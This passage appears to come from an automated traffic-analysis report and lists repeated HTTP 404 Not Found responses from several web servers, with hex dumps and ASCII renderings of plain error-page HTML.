3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:25:31 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:25:34 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:25:36 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 09:25:51 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 09:25:54 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 09:25:56 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:26:19 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:26:22 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:26:25 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:26:28 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 